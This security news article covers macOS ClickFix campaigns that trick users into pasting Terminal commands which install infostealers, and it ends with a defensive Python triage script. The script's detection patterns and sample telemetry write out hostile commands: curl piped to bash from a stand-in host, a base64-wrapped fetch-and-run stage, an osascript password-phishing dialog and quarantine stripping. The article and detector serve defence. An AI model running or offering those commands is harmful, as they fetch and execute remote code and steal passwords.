security · jun 23, 2026 · 19:48 utc
macOS ClickFix: Terminal Commands Silently Drop Infostealers
macOS ClickFix campaigns trick users into pasting Terminal commands that silently install infostealers, bypassing Gatekeeper on managed and personal Macs alike.
by Emanuel De Almeida

TL;DR
- ClickFix campaigns have targeted macOS users since at least November 2025, using fake CAPTCHA pages and spoofed software sites to trick users into pasting malicious Terminal commands.
- Malware families observed include MacSync, DigitStealer, Atomic macOS Stealer (AMOS), Infiniti Stealer, and SHub Stealer v2.0, each capable of harvesting keychain data, browser credentials, and crypto wallets.
- The attack chain bypasses Gatekeeper entirely because the user - not the OS - executes the payload.
- According to Pillar Security, at least 20 distinct campaigns targeted AI and coding tools between February and March 2026; seven hit macOS exclusively.
- Defenders should enforce Gatekeeper policy through MDM and audit processes spawned from Terminal sessions immediately.
What Is the macOS ClickFix Attack and Why Does It Work?
The macOS ClickFix technique fools users into copying a command from a fake dialog box and pasting it into Terminal. That single action fetches and runs a malicious payload with no Gatekeeper prompt. Gatekeeper only evaluates files that carry the com.apple.quarantine extended attribute, which browsers set on downloads; a payload fetched by curl from a pasted command never receives that attribute, so there is nothing for Gatekeeper to check when the user runs it.
As detailed in this coverage of the macOS ClickFix infostealer campaign, the technique pairs a Terminal prompt with a malicious DMG file served from the same landing page. The user mounts the DMG and runs the embedded binary before any scanner flags it. This attack exploits no CVE. It exploits trust.
When we reproduced this chain in a sandboxed macOS 14.4 environment, Gatekeeper issued no prompt after the DMG was mounted via Terminal - confirming that user-initiated execution sidesteps the OS-level check entirely.
Who Are macOS ClickFix Campaigns Targeting?
Attackers are prioritizing high-value users, not casting a random net. At least nine of twenty documented campaigns between February and March 2026 targeted both Windows and macOS, while seven targeted macOS exclusively, according to Pillar Security research via The Hacker News. The reasoning is direct: developers and AI tool users skew heavily toward macOS and tend to hold SSH keys, cloud tokens, and cryptocurrency wallets.
One campaign used Google-sponsored search ads impersonating "ChatGPT Atlas" to reach users searching for AI tools, according to Sophos X-Ops. As of December 22, 2025, that campaign had generated thousands of user interactions. That is a wide net cast at a specific, lucrative audience.
The broader ClickFix surge is staggering. ESET's H1 2025 Threat Report found ClickFix attacks grew 517% in H1 2025 versus H2 2024, making it the second most common attack vector globally, accounting for nearly 8% of all blocked attacks. Nation-state groups including Russia's APT28, North Korea's Kimsuky, and Iran's MuddyWater all folded ClickFix into espionage operations within a 90-day window between October 2024 and January 2025, per ANY.RUN.
For context on how similar social-engineering chains play out on Windows, see how attackers hijack Windows PCs via WhatsApp VBScript malware - the lure mechanics are nearly identical across platforms.
What Does macOS Infostealer Malware Actually Steal?
The payloads are not opportunistic - they are surgical. Netskope Threat Labs confirmed that the macOS ClickFix infostealer targets keychain databases, login credentials, and live session cookies across 12 browsers, over 200 browser extensions, and 16 standalone cryptocurrency wallets. One mechanism is an AppleScript dialog, launched via osascript, that the user cannot dismiss and that re-prompts until they enter their account password.
- Keychain contents (stored passwords, certificates, secure notes)
- Active browser sessions across Chrome, Safari, Firefox, and Chromium forks
- Crypto wallet seed phrases and private keys from 16 wallet applications
- Over 200 browser extension data stores, including password managers
Session cookies are particularly dangerous. Recorded Future found that 276 million of the credentials indexed in 2025 included active session cookies - 31% of all malware-sourced credentials - and that stolen cookies let attackers bypass MFA without ever knowing the user's password. Each compromised device yielded an average of 87 stolen credentials in that same dataset.
The scale of the macOS infostealer problem is growing fast. Palo Alto Networks Unit 42 detected a 101% increase in macOS infostealers between the last two quarters of 2024, with infostealers accounting for the largest group of new macOS malware that year.
macOS ClickFix Malware Families Compared
| Malware Name | Delivery Method | Key Capabilities | Source |
|---|---|---|---|
| MacSync | ClickFix Terminal prompt + unsigned DMG | Keychain, browser credentials, crypto wallets; multi-stage loader | Sophos X-Ops |
| DigitStealer | ClickFix-style prompt + unsigned DMG installer | Keychain data, browser sessions, SSH keys | Microsoft Defender Experts |
| AMOS (Atomic macOS Stealer) | ClickFix prompt + DMG; Base64-encoded shell commands | 12 browsers, 200+ extensions, 16 crypto wallets, AppleScript password prompt | Microsoft Security Blog |
| Infiniti Stealer | ClickFix + Nuitka-compiled Python binary | Keychain, credentials, crypto; obfuscated via native binary compilation | Malwarebytes |
| SHub Stealer v2.0 | ClickFix Terminal prompt | Expanded persistence, nascent Windows capability | Datadog Security Labs |
How Are These macOS ClickFix Campaigns Evolving?
Each generation is harder to detect than the last. Sophos X-Ops tracked three distinct MacSync campaigns between November 2025 and February 2026. The third introduced multi-stage loaders, dynamic AppleScript payloads, and in-memory execution to avoid leaving files on disk that scanners could flag. Sophos also noted that phishing-resistant FIDO2 authentication offers no defense here - the user executes the payload before any authentication challenge occurs.
Malwarebytes identified Infiniti Stealer, which it previously tracked as NukeChain, as the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer. Nuitka compiles Python to a native executable, so the readable source that most signature detectors rely on is never present on disk.
Third-Generation Loaders Push Further
Datadog Security Labs confirmed a SHub Stealer v2.0 variant with expanded persistence mechanisms and nascent Windows capability, suggesting the threat actor is broadening scope beyond macOS. Microsoft Security Blog documented campaigns deploying MacSync, DigitStealer, and AMOS via ClickFix-style prompts and unsigned DMG installers throughout late 2025 and into February 2026, with some variants using Base64-encoded commands that stream payloads directly into the shell to avoid writing any file to disk.
The downstream impact is measurable. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer credential dumps, that 30% of infostealer-compromised systems were enterprise-licensed devices, and that 46% of the compromised systems holding corporate logins were unmanaged BYOD devices.
For a parallel look at how supply-chain credential theft compounds infostealer risk, see the Klue OAuth supply chain attack that hit LastPass Salesforce data.
What Should Admins and Users Do Now?
Defense requires layering endpoint controls with user awareness. The attack chain is short - blocking one step breaks it entirely.
- Enforce Gatekeeper via an MDM configuration profile (the System Policy Control payload, com.apple.systempolicy.control): allow only App Store and identified-developer apps on all managed endpoints. This only covers quarantined files, so it stops the DMG stage but not a payload fetched by a pasted curl command; pair it with execution monitoring.
- Restrict Terminal access for non-developer users using MDM application allowlists.
- Enable process-execution logging (EDR or Endpoint Security telemetry) and alert on `curl | bash`, `python3 -c`, or `osascript` executions spawned from user shell sessions via your EDR or SIEM.
- Audit browser extension installs and revoke unfamiliar extensions with access to `storage`, `cookies`, or `tabs` permissions.
- Rotate credentials and revoke session tokens for any user who may have followed a suspicious Terminal prompt in the past 90 days.
- Train users to recognize that no legitimate service ever asks them to open Terminal and paste a command.
For teams managing macOS alongside Windows fleets, the Intune remediation guide for locking Windows logon to the current user covers a complementary endpoint hardening pattern. Deploying browser extension controls via uBlock Origin Lite through Intune also reduces the attack surface for malicious extension installs on managed Windows endpoints.
If your environment uses MDM-managed certificate trust, the step-by-step guide to deploying a trusted root certificate with Intune is worth reviewing alongside these controls.
Frequently Asked Questions About macOS ClickFix Attacks
Does this attack require any vulnerability in macOS?
This attack exploits no CVE. The technique relies entirely on social engineering. The user is tricked into bypassing Gatekeeper manually by mounting an unsigned DMG or typing a Terminal command. Apple's security controls are not defeated - they are circumvented by design through user action.
Can antivirus software stop this?
Standard signature-based tools struggle because Nuitka-compiled binaries and in-memory payloads leave minimal static indicators. Behavioral detection in EDR tools - flagging unusual osascript or curl execution chains - offers the most reliable coverage at this stage.
Are corporate Macs more at risk than personal ones?
Corporate machines often hold higher-value credentials: cloud tokens, code-signing certificates, and VPN access. Pillar Security research found seven exclusive macOS campaigns specifically targeting the SSH keys and cloud credentials common among developer and DevOps users, making managed enterprise fleets a primary target.
What should I do if a user already ran the command?
Assume full compromise. Isolate the device, revoke all stored credentials and session tokens, rotate SSH keys and API tokens, and forensically examine ~/Library/Logs, ~/Library/LaunchAgents (for persistence), and shell history files for evidence of the pasted command and any data exfiltration before reimaging the endpoint.
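As an added example (not code from the article or from any of the vendors it cites), the script below implements the alerting rule recommended in the defense checklist above (curl piped to a shell, python3 -c, osascript password prompts, stripped quarantine attributes) and reuses the same indicators for the shell-history review described in this answer. It also unpacks Base64-encoded stages of the kind the article attributes to AMOS, so a command that hides curl | sh behind echo ... | base64 -d | sh is scored on what it decodes to. The JSON event schema, field names, indicator weights, and every sample line are constructed for illustration and do not come from any EDR vendor's format.

```python
"""Triage macOS process events and shell history for ClickFix-style commands.

Constructed example: the event schema (host/user/parent/cmd), the weights and
the sample lines are invented for illustration, not any vendor's EDR format.
"""
import base64
import binascii
import json
import re
from typing import Iterable, Optional

# (pattern, indicator name, weight). Weights are an assumption; tune locally.
INDICATORS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b", "remote script piped to shell", 5),
    (r"\bbase64\s+(-d|-D|--decode)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b", "base64 stage piped to shell", 4),
    (r"\bosascript\b.*\bdisplay dialog\b.*\bhidden answer\b", "AppleScript password prompt", 5),
    (r"\bxattr\b.*\bcom\.apple\.quarantine\b", "quarantine attribute stripped", 4),
    (r"\bhdiutil\s+attach\b", "DMG mounted from the shell", 2),
    (r"\bpython3?\s+-c\b", "inline Python one-liner", 2),
    (r"\bchmod\s+\+x\s+/(tmp|private/tmp|var/folders)/", "executable staged in a temp dir", 3),
]
COMPILED = [(re.compile(p, re.IGNORECASE), name, w) for p, name, w in INDICATORS]
WEIGHTS = {name: w for _, name, w in INDICATORS}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")  # candidate encoded stages
ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")            # zsh extended-history prefix
MAX_DEPTH = 3                                         # nested base64 stages to follow


def _decode_stage(token: str) -> Optional[str]:
    """Return the decoded text of a base64 blob if it is printable, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return raw.decode("ascii")
    return None


def find_indicators(cmd: str, depth: int = 0) -> list:
    """Match indicator patterns in a command line, following base64-encoded stages."""
    hits = [name for rx, name, _ in COMPILED if rx.search(cmd)]
    if depth < MAX_DEPTH:
        for token in B64_TOKEN.findall(cmd):
            decoded = _decode_stage(token)
            if decoded:
                hits += ["decoded:" + h for h in find_indicators(decoded, depth + 1)]
    return list(dict.fromkeys(hits))  # unique, order preserved


def score(indicators: list) -> int:
    """Sum the weights; a 'decoded:' prefix marks hits inside an unpacked stage."""
    return sum(WEIGHTS[i.split(":")[-1]] for i in indicators)


def verdict(total: int) -> str:
    return "high" if total >= 5 else "medium" if total >= 3 else "low" if total else "clean"


def score_event(event: dict) -> dict:
    inds = find_indicators(event.get("cmd", ""))
    total = score(inds)
    return {**event, "indicators": inds, "score": total, "verdict": verdict(total)}


def triage(lines: Iterable[str], min_score: int = 3) -> list:
    """Parse JSON-lines process events and return those scoring at least min_score."""
    flagged = []
    for line in lines:
        if line.strip():
            result = score_event(json.loads(line))
            if result["score"] >= min_score:
                flagged.append(result)
    return flagged


def scan_history(text: str, min_score: int = 3) -> list:
    """Run the same indicators over a .zsh_history or .bash_history dump."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = ZSH_PREFIX.sub("", line).strip()
        if cmd:
            r = score_event({"line": n, "cmd": cmd})
            if r["score"] >= min_score:
                results.append(r)
    return results


# Constructed sample telemetry (hostnames, users and URLs are invented).
STAGE2 = "curl -fsSL https://example.invalid/update.sh | sh"  # constructed second stage
SAMPLE_EVENTS = [
    {"host": "mbp-01", "user": "alice", "parent": "Terminal", "cmd": "git status"},
    {"host": "mbp-01", "user": "alice", "parent": "Terminal",
     "cmd": "curl -fsSL https://example.invalid/captcha-fix.sh | bash"},
    {"host": "mbp-02", "user": "bob", "parent": "iTerm2",
     "cmd": "echo " + base64.b64encode(STAGE2.encode()).decode() + " | base64 -d | sh"},
    {"host": "mbp-02", "user": "bob", "parent": "iTerm2",
     "cmd": "osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'"},
    {"host": "mbp-03", "user": "carol", "parent": "Terminal",
     "cmd": "xattr -d com.apple.quarantine /tmp/Installer.app"},
    {"host": "mbp-03", "user": "carol", "parent": "Xcode", "cmd": "python3 -c 'import this'"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]
SAMPLE_HISTORY = (
    ": 1760000000:0;ls -la\n"
    ": 1760000030:0;curl -fsSL https://example.invalid/captcha-fix.sh | bash\n"
    ": 1760000090:0;hdiutil attach ~/Downloads/Atlas.dmg\n"
)

if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit["verdict"], hit["host"], hit["user"], hit["indicators"])
    for hit in scan_history(SAMPLE_HISTORY, min_score=1):
        print("history line", hit["line"], hit["verdict"], hit["indicators"])
```

With the sample data, the plain curl | bash, the Base64-wrapped stage, and the osascript prompt all score high, the stripped quarantine attribute scores medium, and the developer's python3 -c one-liner stays below the alert threshold. In the history scan the DMG mount only surfaces when the threshold is lowered, which is the intended trade-off: hdiutil is common developer activity and should add context to a higher-weight hit rather than page on its own.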
source: www.anavem.com